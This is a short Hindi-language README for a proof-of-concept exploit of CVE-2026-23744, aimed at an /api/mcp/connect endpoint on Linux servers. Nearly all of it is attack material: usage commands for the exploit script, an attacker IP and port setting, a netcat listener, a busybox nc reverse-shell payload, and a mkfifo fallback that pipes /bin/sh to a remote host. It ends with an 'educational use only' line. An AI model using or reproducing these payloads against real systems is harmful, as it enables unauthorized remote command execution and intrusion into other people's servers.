
CVE-2026-23744 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो /api/mcp/connect को लक्षित करता है ताकि रिवर्स शेल के माध्यम से Linux सिस्टम पर रिमोट कमांड निष्पादन प्राप्त किया जा सके।
/api/mcp/connect के माध्यम से रिमोट कमांड निष्पादन के लिए PoC।
pip install requests
python3 exploit.py <target>
उदाहरण:
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
डिफ़ॉल्ट:
busybox nc <IP> <PORT> -e /bin/sh
फ़ॉलबैक:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e विफल होने पर फ़ॉलबैक का उपयोग करेंकेवल शैक्षिक उपयोग के लिए।